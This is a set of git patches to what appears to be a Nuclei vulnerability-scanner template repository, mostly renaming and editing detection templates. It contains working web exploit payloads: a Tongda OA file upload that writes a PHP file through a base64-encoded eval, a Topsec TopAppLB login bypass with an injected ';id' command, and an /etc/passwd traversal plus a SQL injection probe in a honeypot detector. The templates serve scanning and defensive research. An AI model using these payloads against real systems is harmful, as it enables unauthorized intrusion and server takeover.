33bf8b7cb2defdf9c0e9a50cc2d4fac4b0ff99df Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 8 Sep 2023 19:19:09 +0530 Subject: [PATCH 0238/1090] Updated --- ... => tongda-api-arbitrary-file-upload.yaml} | 24 ++++++++++--------- ...l => topsec-topapplb-arbitrary-login.yaml} | 19 ++++++++------- 2 files changed, 24 insertions(+), 19 deletions(-) rename http/vulnerabilities/tongda/{tongda-oa-api-ali-arbitrary-file-upload.yaml => tongda-api-arbitrary-file-upload.yaml} (58%) rename http/vulnerabilities/topsec/{topsec-topapplb-arbitrary-user-login.yaml => topsec-topapplb-arbitrary-login.yaml} (60%) diff --git a/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml b/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml similarity index 58% rename from http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml rename to http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml index 4b82e671d1..961a11bf82 100755 --- a/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml @@ -1,12 +1,17 @@ -id: tongda-oa-api-ali-arbitrary-file-upload +id: tongda-api-arbitrary-file-upload info: - name: tongda-oa-api-ali-arbitrary-file-upload + name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器 + description: | + Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability. reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml + metadata: + max-request: 1 + fofa-query: app="TDXK-通达OA" + verified: true tags: tongda,oa http: @@ -18,7 +23,7 @@ http: Accept-Encoding: gzip --502f67681799b07e5de6b503655f5cae - Content-Disposition: form-data; name="file"; filename="fb6790f4.json" + Content-Disposition: form-data; name="file"; filename="{{randstr}}.json" Content-Type: application/octet-stream {"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"} @@ -30,16 +35,13 @@ http: Content-Type: application/x-www-form-urlencoded - | - GET /fb6790f4.php HTTP/1.1 + GET /{{randstr}}.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - # req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200' - - 'status_code_2 == 200 && contains(body_2,"OK")' - - 'status_code_3 == 200 && contains(body_3,"phpinfo")' + - 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200' + - 'contains(body_2,"OK") && contains(body_3,"phpinfo")' condition: and \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml similarity index 60% rename from http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml rename to http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml index 77604a295a..6c8589bc4d 100755 --- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml +++ b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml @@ -1,12 +1,17 @@ -id: topsec-topapplb-arbitrary-user-login +id: topsec-topapplb-arbitrary-login info: - name: Topsec TopAppLB Any account Login + name: Topsec TopAppLB Any account Login - Arbitrary Login author: SleepingBag945 - severity: critical + severity: high description: | - Any Account can log in to the background - tags: defaultaccount + Any Account can log in to the background.Enter any account on the login page, the password is ;id + reference: + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json + metadata: + max-request: 1 + fofa-query: title="TopApp-LB 负载均衡系统" + tags: topsec,topapplb,misconfig http: - raw: @@ -14,7 +19,6 @@ http: POST /login_check.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate @@ -25,9 +29,8 @@ http: userName=admin&password=%3Bid - matchers: - type: dsl dsl: - 'status_code_1 == 302 && contains(header_1,"redirect.php")' - condition: and + condition: and \ No newline at end of file From df00ed85992042d73ae45b589481bdf74133d919 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 8 Sep 2023 15:45:30 +0000 Subject: [PATCH 0240/1090] Auto Generated Templates Checksum [Fri Sep 8 15:45:30 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6d5d50425b..abaffe1b4d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5425,7 +5425,7 @@ http/takeovers/pingdom-takeover.yaml:8dc90e0351c4e29bf7830facaf29afb8211431f9 http/takeovers/proposify-takeover.yaml:65da6d82d72e30f46b4a4bb47336d1d5ce24aa32 http/takeovers/readme-takeover.yaml:acc92536d30fedf1a013599d0e05e9b0b236fdf3 http/takeovers/readthedocs-takeover.yaml:8215d1234ce58d908c1a7bcb335b3b7762c8e61f -http/takeovers/shopify-takeover.yaml:53211cf6d77c786689ba345452dd8953ee21daac +http/takeovers/shopify-takeover.yaml:c039e21aea4cc114067107720b9135a7e82ac63c http/takeovers/short-io.yaml:bacfd2e656abf3e17e3c09c7b46d021212b384e9 http/takeovers/simplebooklet-takeover.yaml:811f5966e39b92e7477a725948e028cfe887d16a http/takeovers/smartjob-takeover.yaml:17770b81a0ed6749407fa062664838bd5d4ec578 @@ -7054,7 +7054,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:34b223abd074c2722835b86e495a8915b2931d48 +templates-checksum.txt:7a4903bb53f009261e5ff78350cfb15acb2e83f2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From fedc0f666b3317d5df2108396762499527637b01 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 8 Sep 2023 22:58:03 +0530 Subject: [PATCH 0241/1090] Update honeypot-detect.yaml --- http/technologies/honeypot-detect.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/http/technologies/honeypot-detect.yaml b/http/technologies/honeypot-detect.yaml index ce207cd385..b8650ce302 100644 --- a/http/technologies/honeypot-detect.yaml +++ b/http/technologies/honeypot-detect.yaml @@ -4,10 +4,13 @@ info: name: Honeypot Detection author: j4vaovo severity: info - description: Honeypot Detection. - tags: honeypot,tech + description: | + Honeypot was Detected. + reference: + - https://github.com/zema1/yarx metadata: max-request: 1 + tags: honeypot,tech,cti variables: rand1: "{{randstr}}" @@ -15,10 +18,9 @@ variables: rand3: "{{randstr}}" http: - - raw: - - | - GET /?{{rand1}}=../../../../../../../../etc/passwd&{{rand3}}=1%20and%20updatexml(1,concat(0x7e,(select%20md5({{rand2}}))),1) HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/?{{rand1}}=../../../../../../../../etc/passwd&{{rand3}}=1%20and%20updatexml(1,concat(0x7e,(select%20md5({{rand2}}))),1)" matchers-condition: or matchers: From 670fd19ea3dc343f78c74f25a0791dc879ed8521 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 8 Sep 2023 17:29:36 -0300 Subject: [PATCH 0242/1090] Create mythic-c2-ssl.yaml --- ssl/c2/mythic-c2-ssl.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 ssl/c2/mythic-c2-ssl.yaml diff --git a/ssl/c2/mythic-c2-ssl.yaml b/ssl/c2/mythic-c2-ssl.yaml new file mode 100644 index 0000000000..c8881d969c --- /dev/null +++ b/ssl/c2/mythic-c2-ssl.yaml @@ -0,0 +1,31 @@ +id: mythic-c2-ssl + +info: + name: Mythic C2 SSL - Detect + author: johnk3r + severity: info + description: | + Mythic is a multiplayer, command and control platform for red teaming operations + reference: | + https://docs.mythic-c2.net + https://www.team-cymru.com/post/mythic-case-study-assessing-common-offensive-security-tools + metadata: + max-request: 1 + verified: "true" + shodan-query: ssl:"Mythic" + censys-query: services.tls.certificates.leaf_data.issuer.common_name:Mythic + tags: c2,ir,osint,malware + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_dn + words: + - "O=Mythic" + + extractors: + - type: json + json: + - " .issuer_dn" From 0663c6d6d0c921ca2f2dc7ae5e9bfc34344d6256 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 04:02:10 +0000 Subject: [PATCH 0243/1090] Auto WordPress Plugins Update [Sat Sep 9 04:02:10 UTC 2023] :robot: --- helpers/wordpress/plugins/fluentform.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 2 insertions(+), 202 deletions(-) diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt index 733db2686a..3fc3a24531 100644 --- a/helpers/wordpress/plugins/fluentform.txt +++ b/helpers/wordpress/plugins/fluentform.txt @@ -1 +1 @@ -5.0.8 \ No newline at end of file +5.0.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index f251df0e8e..1f14f76936 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.4.4 \ No newline at end of file +9.4.5 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 